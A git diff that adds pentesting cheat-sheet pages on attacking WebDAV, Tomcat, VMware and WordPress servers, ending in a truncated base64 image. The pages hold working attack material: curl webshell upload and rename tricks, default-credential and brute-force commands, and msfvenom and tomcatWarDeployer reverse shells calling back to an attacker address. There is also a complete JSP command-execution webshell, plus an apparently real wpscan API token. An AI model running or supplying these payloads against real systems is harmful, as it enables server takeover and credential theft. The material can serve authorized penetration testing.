+**ftp\_put**  
+**ftp\_nb\_put**  
+**exif\_read\_data**  
+**read\_exif\_data**  
+**exif\_thumbnail**  
+**exif\_imagetype**  
+**hash\_file**  
+**hash\_hmac\_file**  
+**hash\_update\_file**  
+**md5\_file**  
+**sha1\_file**  
+**-- highlight\_file**  
+**-- show\_source**  
+**php\_strip\_whitespace**  
+**get\_meta\_tags**
+
diff --git a/pentesting/pentesting-web/put-method-webdav.md b/pentesting/pentesting-web/put-method-webdav.md
new file mode 100644
index 00000000..a718d1f9
--- /dev/null
+++ b/pentesting/pentesting-web/put-method-webdav.md
@@ -0,0 +1,94 @@
+# WebDav
+
+A **HTTP Server with WebDav** active is a server where you probably can **update, delete, move, copy** files. **Sometimes** you **need** to have **valid credentials** \(usually check with HTTP Basic Authentication\).
+
+You should try to **upload** some **webshell** and **execute** it from the web server to take control over the server.  
+Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth) ****_\(Basic Auth\)_.
+
+Other common configuration is to **forbid uploading** files with **extensions** that will be **executed** by the web server, you should check how to **bypass this:**
+
+* **Upload** files with **executable extensions** \(maybe it's not forbidden\).
+* **Upload** files **without executable extensions** \(like .txt\) and try to **rename** the file \(move\) with an **executable extension**.
+* **Upload** files **without executable extensions** \(like .txt\) and try to **copy** the file \(move\) with **executable extension.**
+
+## DavTest
+
+**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**:
+
+```bash
+davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
+davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
+```
+
+Output sample:
+
+![](../../.gitbook/assets/image%20%28169%29.png)
+
+This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
+
+## Cadaver
+
+You can use this tool to **connect to the WebDav** server and perform actions \(like **upload**, **move** or **delete**\) **manually**.
+
+```text
+cadaver <IP>
+```
+
+## PUT request
+
+```text
+curl -T 'shell.txt' 'http://$ip'
+```
+
+## MOVE request
+
+```text
+curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
+```
+
+## IIS5/6 WebDav Vulnerability
+
+This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename** files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed** as if it were a .asp file \(you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**\).
+
+Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** \(cadaver will said that the move action didn't work, but it did\).
+
+![](../../.gitbook/assets/image%20%28259%29.png)
+
+## Post credentials
+
+If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:  
+_**/etc/apache2/sites-enabled/000-default**_
+
+Inside it you could find something like:
+
+```text
+ServerAdmin webmaster@localhost
+        Alias /webdav /var/www/webdav
+        <Directory /var/www/webdav>
+                DAV On
+                AuthType Digest
+                AuthName "webdav"
+                AuthUserFile /etc/apache2/users.password
+                Require valid-user
+```
+
+As you can see there is the files with the valid **credentials** for the **webdav** server: 
+
+```text
+/etc/apache2/users.password
+```
+
+Inside this type of files you will find the **username** and a **hash** of the password. These are the credentials the webdav server is using to authenticate users.
+
+You can try to **crack** them, or to **add more** if for some reason you wan to **access** the **webdav** server:
+
+```bash
+htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
+```
+
+To check if the new credentials are working you can do:
+
+```bash
+wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
+```
+
diff --git a/pentesting/pentesting-web/python.md b/pentesting/pentesting-web/python.md
new file mode 100644
index 00000000..8b081f0c
--- /dev/null
+++ b/pentesting/pentesting-web/python.md
@@ -0,0 +1,14 @@
+# Python
+
+## Server using python
+
+test a possible **code execution**, using the function _str\(\)_:
+
+```python
+"+str(True)+" #If the string True is printed, then it is vulnerable
+```
+
+You [can find here **several tricks**](../../misc/basic-python/bypass-python-sandboxes.md) to obtain **code executing** in python if you can execute arbitrary code.
+
+### \*\*\*\*[**Python Deserialization**](../../pentesting-web/deserialization/#python)\*\*\*\*
+
diff --git a/pentesting/pentesting-web/tomcat.md b/pentesting/pentesting-web/tomcat.md
new file mode 100644
index 00000000..63bd9f06
--- /dev/null
+++ b/pentesting/pentesting-web/tomcat.md
@@ -0,0 +1,168 @@
+# Tomcat
+
+It usually runs on **port 8080**
+
+## Avoid to run with root
+
+In order to not run Tomcat with root a very common configuration is to set an Apache server in port 80/443 and, if the path requested matches a regexp, the request is send to the Tomcat running in other port. 
+
+## Username Enum
+
+In some versions prior to Tomcat6 you could enumerate users:
+
+```bash
+msf> use auxiliary/scanner/http/tomcat_enum
+```
+
+## Default credentials
+
+The most interesting path of Tomcat is _/manager/html_, inside that path you can upload and deploy war files \(execute code\). But  this path is protected by basic TTP auth, the most common credentials are:
+
+* admin:admin
+* tomcat:tomcat
+* admin:&lt;NOTHING&gt;
+* admin:s3cr3t
+* tomcat:s3cr3t
+* admin:tomcat
+
+You could test these and more using:
+
+```bash
+msf> use auxiliary/scanner/http/tomcat_mgr_login
+```
+
+### Bruteforce
+
+This could be needed.
+
+```bash
+hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
+```
+
+## Vulns
+
+A well-known vulnerability _to_ access the application manager __ is mod\_jk in CVE-2007-1860, that allows **Double URL encode path traversal.**
+
+In order to access to the management web of the Tomcat go to: _pathTomcat/%252E%252E/manager/html_
+
+Take into account that to upload the webshell you could need to use the double urlencode trick and send also a cookie and/or a SSRF token.  
+To access to backdoor you could also need to use the double urlencode trick.
+
+## RCE
+
+Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file \(execute code\)**.
+
+### Limitations
+
+You will only be able to deploy a WAR if you have **enough privileges** \(roles: **admin**, **manager** and **manager-script**\). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` \(it vary between versions\) \(see [POST ](tomcat.md#post)section\).
+
+```bash
+# /!\ tomcat7 and above uses /manager/text/undeploy and /manager/text/deploy paths
+# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
+
+# deploy under "path" context path
+curl --upload-file monshell.war "http://tomcat:Password@localhost:8080/manager/deploy?path=/monshell"
+
+# undeploy
+curl "http://tomcat:Password@localhost:8080/manager/undeploy?path=/monshell"
+```
+
+### Metasploit
+
+```bash
+use exploit/multi/http/tomcat_mgr_upload
+msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
+msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
+msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
+msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
+msf exploit(multi/http/tomcat_mgr_upload) > exploit
+```
+
+### MSFVenom Reverse Shell
+
+```bash
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
+```
+
+Then, upload the revshell.war file and access to it \(_/revshell/_\)
+
+### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
+
+In some scenarios this doesn't  work \(for example old versions of sun\)
+
+#### Download
+
+```bash
+git clone https://github.com/mgeeky/tomcatWarDeployer.git
+```
+
+#### Reverse shell
+
+```bash
+./tomcatWarDeployer.py -U <username> -P <password>-H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
+```
+
+#### Bind shell
+
+```bash
+./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
+```
+
+### Using [Culsterd](https://github.com/hatRiot/clusterd)
+
+```bash
+clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
+```
+
+### Manual method - Web shell
+
+Create **index.jsp** with this content:
+
+```java
+<FORM METHOD=GET ACTION='index.jsp'>
+<INPUT name='cmd' type=text>
+<INPUT type=submit value='Run'>
+</FORM>
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec(cmd,null,null);
+         BufferedReader sI = new BufferedReader(new
+InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) { output += s+"</br>"; }
+      }  catch(IOException e) {   e.printStackTrace();   }
+   }
+%>
+<pre><%=output %></pre>
+
+```
+
+```bash
+$ mkdir webshell
+$ cp index.jsp webshell
+$ cd webshell
+$ jar -cvf ../webshell.war *
+webshell.war is created
+```
+
+You could also install this \(allows upload, download and command execution\): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
+
+## POST
+
+Name of tomcat credentials file is _tomcat-users.xml_ 
+
+```bash
+find / -name tomcat-users.xml 2>/dev/null
+```
+
+Other ways to gather tomcat credentials:
+
+```bash
+msf> use post/multi/gather/tomcat_gather
+msf> use post/windows/gather/enum_tomcat
+```
+
diff --git a/pentesting/pentesting-web/vmware-esx-vcenter....md b/pentesting/pentesting-web/vmware-esx-vcenter....md
new file mode 100644
index 00000000..bf095b3d
--- /dev/null
+++ b/pentesting/pentesting-web/vmware-esx-vcenter....md
@@ -0,0 +1,18 @@
+# VMWare \(ESX, VCenter...\)
+
+## Enumeration
+
+```text
+nmap -sV --script "http-vmware-path-vuln or vmware-version" -p <PORT> <IP>
+msf> use auxiliary/scanner/vmware/esx_fingerprint
+msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump 
+```
+
+## Bruteforce
+
+```text
+msf> auxiliary/scanner/vmware/vmware_http_login
+```
+
+If you find valid credentials, you can use more metasploit scanner modules to obtain information.
+
diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md
new file mode 100644
index 00000000..48b4c4fe
--- /dev/null
+++ b/pentesting/pentesting-web/wordpress.md
@@ -0,0 +1,209 @@
+# Wordpress
+
+## Basic Information
+
+**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_  
+**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: ****Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)  
+**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\*\*\*\*
+
+In **wp-config.php** you can find the root password of the database.
+
+Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
+
+## **Enumeration**
+
+```bash
+cmsmap -s http://www.48pallmall.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
+wpscan --rua -e ap --url http://www.domain.com --api-token qNzF78w2S7s8QarQ2ISZbNR2Gq4FOmJV05HGjwvRMlM --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
+#You can try to bruteforce the admin user using wpscan with "-U admin"
+```
+
+### Information Disclosure
+
+Inside the Wordpress folder try to access:
+
+* _**/wp-json/wp/v2/users**_ -- This could leak usernames
+* _**/wp-json/wp/v2/pages**_ -- This could leak IP address
+
+### XML-RPC
+
+If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources.
+
+To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
+
+#### Check
+
+```markup
+<methodCall>
+<methodName>system.listMethods</methodName>
+<params></params>
+</methodCall>
+```
+
+![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)
+
+#### Credentials Bruteforce
+
+_**wp.getUserBlogs**_, _**wp.getCategories**_ or _**metaWeblog.getUsersBlogs**_ are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
+
+```markup
+<methodCall>
+<methodName>wp.getUsersBlogs</methodName>
+<params>
+<param><value>admin</value></param>
+<param><value>pass</value></param>
+</params>
+</methodCall>
+```
+
+The message _"Incorrect username or password"_ inside a 200 code response should appear if the credentials aren't valid.
+
+Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:
+
+
+
+![](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCACyAyADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDzC91bURfXAF/dACRgP3zev1pseqXzRuzandBwRtUzNz6nr+lTQqr6jfJhDI0mIwdmT8xzjfx6VHMlk90PMlCfIm7Ztx/tH5eN3Timld2E3ZFtLt5pGY63dQpvI2+cScDv16Gq93qN5FHEYdSnc5cErcEk4PBIzxxTTBpKSIRcSSKXwwLYwMfT171GItOdFzMY3CgMA3BPGSDj6/X2rTl0toZqWt9TSWXMUjHxHdbgqsqiQ/xeuW6juB60kV0XcMNavCguVjKy3AUsndvvf4cVQli08QKsMsbScBmdj0yeRgdenH86VorCOTbHNDIgmQ5k6lcfMPcZo5degcz8zRWQ5Bl8Q3K5YgiOfdj5scfN26knr2qM3LCGQx67czyC3L8zNFscEfLyfnyM9PSsadYFX92+X3sCF5Xbng1BWbNIm9HeSjS7mSbWLj7WhHlqlySD0I789Tn0xS21w0lpDNP4gvEkctvjWT7oHTq3U8dsc1gUUJg0dEJH3YPiG4wE3bxPwTn0znjuOp7VNJKAuxNbnJCR7pTd9zIQxA3f3cHH581y9FO67C5X3Oq8qT7Et43iC+S3aQL5mSwQY5yAeueOKITEI98viO6l8yN/KWO5CMHC5G7cflBPGDjNctubbt3NtznbnjP0pKTaew0mtzobvUUaa0jttVvIkEERld5mYvI2N2SDhcfTtT9VvFt7+WKy1S5eHMYRhdlsZHzZOcfz+vaubopDLz6rqCuwTUrplB4bzWGR+dN/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+1tS/6CF1/wB/m/xqnRQBc/tbUv8AoIXX/f5v8aP7W1L/AKCF1/3+b/GqdFAFz+1tS/6CF1/3+b/Gj+1tS/6CF1/3+b/GqdFAFz+1tS/6CF1/3+b/ABo/tbUv+ghdf9/m/wAap0UAXP7W1L/oIXX/AH+b/Gj+19S/6CF1/wB/m/xqnRQBoLz4hH/X1/7NWfW1alm1S+hjZhJLKAu0uP4z1KjIqjqT77teWJWNVJYNnIH+1yfqaAKdXrb+zdg+0+bnac4Jzuz/ACxVGr1ubHy/36EFUyQc5Y5HTB9M/TrzVQ3JlsSbtLRiEVmGEIaQnsfm4A9PwpMaUx3ZkXJztyePbp0689abLJp21BDC5JChy2eOuSOevT2qZ5dG6JbyfeByScY7960+4z+8kd9Flk5DRrnnYpGRz/iPyqCQaP5TeUZzIE+XJOC35fpVSdrcqBCrbg7fMRjK9hjnmoKlz8kUoebNK3i02ZmQlxI0iBBuIBH8WOwHfJPapIxo0cq7syKJXRtxbDLtIVuBxzg45PPtWTRWbNEbMK+H/KXzjcF/L+baxxv/AC6fzqGzTRxBIL2WVpiRsaMEADAzxjr1rMooA2I20mIxo7JPEs6lgUYMy7MNzjON3OPaogNNNvEGdPMVZMqN+C2Rty23OMZ/TpzWZRQBrSf2WlvIttN8724yZYyf3u4H5eOOM+1RXX2CW8kMcihWdTuVCqhcfNgYGDnPas6imnZiauaaHSJEV5RKkpyWVSQo9B04pofTTGA0ZXdGoJUksGGcnnj0rOoqufyRPJ5mtC2kROzMDIMY2sGI6jpx+f6UAaITuZpuo+VQRxj/ABrJop+08kHJ5svTDTBt8oykbG3Ek53dscY/+tVGiiobuUlYKKKKQwooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKANm1VpdSvoFDZkkAztYqPnP3tpBA5qlqZJulBVwViVTvUqenoSTirlugl1G/hZQUeUZdlVlT5zyQxFUtR/wCPlF8soFiUAEAZHqACRj8aAKlOf+H/AHRTac/8P+6KAEX7w4zz0z1rRFxp4UF7bJMhJUKMqoxgZzz3+vWs9P8AWL/vCkP3j9apSsJxuX1u9PF0GayH2cbjtx8xJJxznpikuLqxdMQ2ez5Cv1PGDn2qrbyCKXeYw4APB7e49xVlL22Ebq1mpZotmePvf3un0/X1qlK6sQ42ZSIKnDAgjqCMGkrR+32vmmR7RpT8v+sYHoFBzx/s/qarXF1HMpCxImXLggAYHoMdqlpLZlJt7or0UZHrRUlBRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAbEGw6jfLKwSJpRvlZkAT5zzhuDVLUTm4T5cARKFIZTuHr8vH5Vbgm2azcQkPiefZuR9pX5vofWqF3cfaphJtK4QLy24nHcnAoAgpz/AMP+6KbTn/h/3RQAJ/rF+opD94/WlT/WL/vCkP3j9aAFTo/+7/UU2nJ0f/d/qKbQBZt7n7OnMaupkDdcE47E+lTSapI8pdIkjB3EKoGAT36dRVL/AJZD/eP8hTarmaViXFN3NOO/82FYhaqZFjKoQuS7cc/hyce9Upnec+Z5eFVVUkDP0yfWp4tRmtwoCI2I9gPI469vr+PenyavNJw0aBMINgJA+UkjPPPXFW2mtWSk09EZ+D6Girt3c3N07q8BUuwcqFOcgYH+e9VmhkVEcrkPnGOehwfpWbXYtPuR0U4o4UsUYKADkj1py28zuEWGQsxAACnqelFmO6I6KeYpB1jcc45U9aVbeZkZ1hkKqNxIU4A6ZosxXRHRT/KkLMojfcvUbTkUeTLnHlSZzjGw0rDuMoqRoJkIDROMruHy9vWmtHIq7mjdRxyVI69KLMLjaKeYZR1ik64+6etHlS4B8qTnp8p5oswuMop4hlOcRSHAycKTgetSx2N3KMpbSkbtmdhA3Yzj8qAK9FSpbTySIiQSlnbYo2HlvSnzWN3bnEttKv8AwHPYHt7EfnQBXop7QyoCXikXHJ3IRilEEx3YjbKkKRjnJ7YoAjop4ilPSKQ9+FNIUcKWKMFGMkj16UBcbRT/ACpA23y33HttOaUwyKiOV4ckDHJ465HbrTsxXRHRTtjhdxRgoGckdqcsEzsqrFIWYgABTznp+dFmO6I6KlW2nZ9gicHJHK45HWmiKQ4xE5yMjCnkev0osxXQyineVJu2+W+702nNHlyeZ5flv5mcbNp3Z+lIY2ipktLmQsEt5m2qWOEPAHU/hRJa3EQJkgkUDOTt6Y4NAENFSeRNz+4l4OD8h4PYfWpl068dY28ghZN2wsQN2ASRz34P5UAVaKeIZmAIhkIK7gQh6ev096QxyLu3RuNoBOVIwD0oAbRUwtbgymJYXZwSMKuegyaaIJWBPlsAFLZIwMDrTsxXRHRT/JlyR5UnHJ+U8UgjckgI3DbTx0Pp9aLMdxtFPMUiuyeWxZeuBmleGSPbuX7yhgRzwaVmFyOinGN1GWRhzjkd/SnfZ5iCRE5w20gDnP0p2Yrojop4hlbpE57/AHTSvBKjsjROGU4I2niizC6I6KeYpAQpjcEnABU5J9KPKlHWJ/8Avk0rDuMoqQ28wjMhicKDgkqaQQynpFJ1x909fSnZiuhlFOWORxlY3YeoUnp1o8qTGfLfGM52np60rDuNop/lS5x5b5JwBtOc+lKIJiwUQykk4A2HkjqKAI6KkEEx6QynjP3D09aaY5FzujcYG45UjA9aAG0VI1vMjbTE+c44XPPp9ab5UmAfLfB5B2mnZiuhtFO8uTcV8ttwGSMdvWnRwySMqqh+chQTwMnpz0oswuiOineW+7bsYkegzR5b5xsbO3d07ev0pDG0U/ypef3UnHX5TxSGOResbjHHKmiwXG0U7y5N23Y2cZxjt6082042Zhf5wCvynnJwKdmK6IqKkMEyuUMMgYHaQVPX0poRyoYIxUnAIHFKw7jaKkEEpV22EBAGIPBwTjIHfmmiORukbnJxwpp2YXQ2inCN2GVRiM44Uml8qXGfKfGM52np6/SlYLjKKf5Um7b5b7j22mhIZJGCpGzEttGB39KdmF0MoqX7NOS4EMh2AlsKeADgn6Uwo6qSyMAMZJGOvSlZhdDaKeYpA20xvu9NpzSmGRURyvD5xjnocH6U7MLojopxRwpYowUDOSO1OW3md1RYZCzEAAKeSelFmF0R0VKtvMzbRE4PI5GBx1poikPSJ+Ru+6enr9KLMV0Mop/kzfN+5kO04OEPFOS2nkmEKxP5hONpGPzz0pDIqKkEEzbdsMp3DK4QnI9RTorWaeKaWOMmOEAyN2Gen4+1AENFSeRNnHky53bcbD19Pr7UksTwTPDKu2RGKsvoRQAyiiigDQX/AJGEf9fX/s1Z9aC/8jCP+vr/ANmrPoAKUnOPYYpKVhjHuAaAAHDA+hzSHk5pQMsB6nFIeCRQAoOM+4xSUoGd3sM0lAC5+Xb75pKXHyBvfFJQArHJ/AChSyurKSGByCPWhhg/gDQm7euzdvz8u3rn2oQGjFc36SHZGu9Zd2zbzuIPGPzPsaeJ9RBjkForF97qRGTuy2SevYioQL8zIViBdZCRtAwXPBz2zSSLdtGq4DF9ysqphl+cZB/4Fitbu3Uysr9B802oy/MysT5Kgsik7UPI+mcUjXF/ETuhKuZVkJKHO/tx2z+tLv1CExlodoRFYKEALIMjtyep/Onytf3V4Wij8hnkVTtcD5wOAT/TtT+8X3EaXF5G3mqikRkp5eCQDnPTPYkc+4oMl44kLxqu6D5twI3qCOR7jjpTVF+jRyRx7du5V2BccnB4+v8AIVJv1FoW3BNsUOMOFyEJH68Cl06j69BsdxqCN5ixthCuMpwhHA+ncVN/a2qcvg/Ixz8p69+KjaXUpwYigZWK4UKAGJ5GOxz1pywawJVYQys6uSCwBw2Oev8A+qmnLpcTUeth323UirghYw0bEkgruA64PqMVV8y/YyybJMnG9tp+UZ/QZH6VZZdVCJGYvMVI2x8gOAQN2ffGKjmm1Jo3ikXKlQWQKM4z1wPc8/Wh363BW6WFju9QWT5IssJOV2fxnnp69+KsHUNYZUbyyRIGK7UPIzzjB45qqF1IuH2mQiXjOCA/TA9PT0pzWuqOm02r/NuHCAHBOSPpmhOVtLg1G+tiW2v9VsYSkC/uzGrEBM7V5xn9TSyX+rS3J8xMSSSKRvyNrYIGMnjIJ68VHbx6pKqvBbF44kGdijBXn8+re9WZrbVJrzzTbJblpVUpIy8sAWXI7j9Kh8pa5h8N7rMjrtSBmMnkkEjJYZIB547/AF96dHqOuLCbgRw7PLZ9zKMhSQp756jpVdV1iSaJTaxqwmLAmJAFZjyx9vf24qWWLxBGyqWadkR9jKQxVSBuI/Age1QWMvtW1oJLBcnbgKz7Rgr6Z5/Q5qoov/PCxQ4kLPyg4LEfN+IFWLqHXCxlubWQhNpIKAqOeDgd8k/nVWH7dgpHtZlmJxgElsEnn0x1+tXEiRZTUdVEWAiogV3yUIBHU1BPNqczs7xSK3lgM2wjC5z36DP8qSK31It5iWpb920YygICjgj+lSma/jtpoLi1LmRQ3zDkAk84HUZNXdta3Isk9LES3l9G5PljIlBIKfxnt+PXjvzUn2q/+0HFsjyB2YlYydxJye/PK/pUQ/tEy/dLtvyM4IVunHoeQMfT0p0T6harCIm+ZC6hNvKHIBzn3I/OhN+Y2l5CT3N9JsZiG3QgBkBOFP8AI/Lz9KGuL+MvuiKsZEdiUOdw6HHqcfjS79SgRf3Xl/uvl/djO3nkd/4jz70H+0ppyeVkeRVZgwX5+wJ/XFGvmGnkEUl81zGyRgskhRY+cbjknjPbNWLa5vY4ple2d4xEQCpwFUYU4PpwOlV4lvxNGVWNOWUHClSc5PHfp+lKTqlxGm6LenlkgFVwVOCT+gNCdlpcTV+xNa6rqVgApi/dAoSpTBA7AHsDjrRa3tympi6ktVeRG2bUHz5KFQoznIA5waiK6vdsGWORywCh41AyByOR25zUaHUFv0hSPF0CXCBV5JHJ9OneofLctc1i1NqOqXDDEEnlbZFVCGPynrnnkj14pjalqYBJgVQ6g/6o4PO7d6Z4zn27U2Sw1aXzZJoWXdGxZnKqGCnJx75qSddUNvIskYkHERZCMKA3THqSf50lyj94jm1PU5LkTybw8cu7GWA3HAA657DjNSG/1EypH9mik8pmKqsZK5O7OMH3bp+uKjNrrCTYe3kLiQYVwOHxxgfQjpx0qW2t9Tt4rWRZoo0YuIt3zYIyTnj/AGTg/wCNHuh7xLFq91FbSRywCUTQAKYSRgYI59+O2OnuapXF1fPMXuLcZyhKmM/eH3Se+T+tSRpq/lho7fCiLOQi8Lyc/Xk+/NQ3DaiksrTb45Ay7yMA7uoHHfvin7vQWvUdBJf/ACRogZlmIAIJYswOR16Y64oUX4Mh8guqwshyDtCD5SRzSol+LhREseQXAOFCserdeO36UNJqEsQ83Z5YidgGVcFeM8D6Cr6dSevQka+uvsc8VxbuzSAHdyOCSRnvjJP8qgEt88hLIHdZAQpHIcjjAHsOnsKfP/ar7nlVk2IAzDC4XJI5HvUYa+jmRtgWQSkDKgbnYYPHfjv70Nu+txJK2liW2uNTtxF5UDHYrKhMZP1/LpTVub2FF22yqPLCq3lnoAcHn2Jpjx39zM+FaVpFIyoGHGd3H86lknvZIPL4mEkSgFBjavJxjHXg/rQm/Mdl5Ect3ftNJKwZX3ruOO4+6Of5U+Ga/trkC3hw6